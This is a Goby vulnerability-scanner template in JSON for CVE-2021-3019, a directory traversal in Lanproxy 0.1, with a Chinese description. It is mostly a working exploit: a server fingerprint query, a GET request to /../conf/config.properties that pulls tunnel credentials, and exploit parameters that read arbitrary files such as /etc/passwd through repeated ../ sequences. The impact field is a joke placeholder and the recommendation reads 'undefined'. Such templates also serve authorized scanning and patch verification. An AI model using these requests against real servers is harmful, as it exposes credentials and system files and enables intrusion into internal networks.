Goby/json/Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json

{
      "Name": "Lanproxy_Arbitrary_File_Read_CVE-2021-3019",
      "Level": "2",
      "Tags": [
            "目录遍历"
      ],
      "GobyQuery": "header=\"Server: LPS-0.1\"",
      "Description": "Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具，支持tcp流量转发，可支持任何tcp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面等等）本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。",
      "Product": "Lanproxy 0.1",
      "Homepage": "https://github.com/ffay/lanproxy",
      "Author": "PeiQi",
      "Impact": "<h5><span style=\"font-size: 1.25em; color: rgb(65, 140, 175);\">咩咩咩</span>🐑</h5>",
      "Recommandation": "<p>undefined</p>",
      "References": [
            "http://wiki.peiqi.tech"
      ],
	  "HasExp": true,
	  "ExpParams": [
		{
			"name": "Filename",
			"type": "input",
			"value": "/../conf/config.properties",
			"show": ""
		},
		{
			"name": "/etc/passwd",
			"type": "textarea",
			"value": "/../../../../../../../../../../etc/passwd",
			"show": ""
		}
		
	  ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/../conf/config.properties",
                        "follow_redirect": true,
                        "header": {},
                        "data_type": "text",
                        "data": ""
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "server.ssl",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
	  "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "{{{Filename}}}",
                        "follow_redirect": true,
                        "header": {},
                        "data_type": "text",
                        "data": ""
                  },
                  "SetVariable": [
					"output|lastbody"
				  ]
            }
      ],
      "PostTime": "2021-01-21 20:51:57",
      "GobyVersion": "1.8.230"
}